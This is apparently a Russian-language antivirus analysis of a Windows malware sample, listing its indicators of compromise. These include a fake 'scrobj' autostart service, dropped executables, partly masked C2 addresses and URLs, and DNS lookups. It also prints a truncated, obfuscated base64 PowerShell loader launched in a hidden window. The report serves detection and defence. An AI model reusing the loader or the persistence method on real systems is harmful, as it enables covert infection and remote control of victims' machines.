Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\scrobj] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\scrobj] 'ImagePath' = '"%WINDIR%\SysWOW64\kernel32\scrobj.exe"'
- 'scrobj' "%WINDIR%\SysWOW64\kernel32\scrobj.exe"
- 'scrobj' %WINDIR%\SysWOW64\kernel32\scrobj.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHYAcwBxAHEAdwBqAD0AKAAoACcATwAyACcAKwAnAGIAYQAnACkAKwAnAGYAcwAnACsAJwA2ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAFcATwByAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\drar13o2q.exe
- %WINDIR%\syswow64\kernel32\scrobj.exe
- %TEMP%\word\2019\drar13o2q.exe в %WINDIR%\syswow64\kernel32\scrobj.exe
- '17#.#1.218.65':80
- '45.#5.36.51':443
- http://ca####ethovenlb.com/classes/mPaUG3/
- http://45.##.36.51:443/wTYXBIrsYR8LvBqrTU/uCfhEhyJPEJi1pr/naML2vvWw1/UdbWMHwxU7vL5VwP/HwYQD6/ via 45.#5.36.51
- DNS ASK bu####uzmekursu.com
- DNS ASK ca####ethovenlb.com
- '%TEMP%\word\2019\drar13o2q.exe'
- '%WINDIR%\syswow64\kernel32\scrobj.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHYAcwBxAHEAdwBqAD0AKAAoACcATwAyACcAKwAnAGIAYQAnACkAKwAnAGYAcwAnACsAJwA2ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAFcATwByAGQAXAAyADAAMQA5AF...' (со скрытым окном)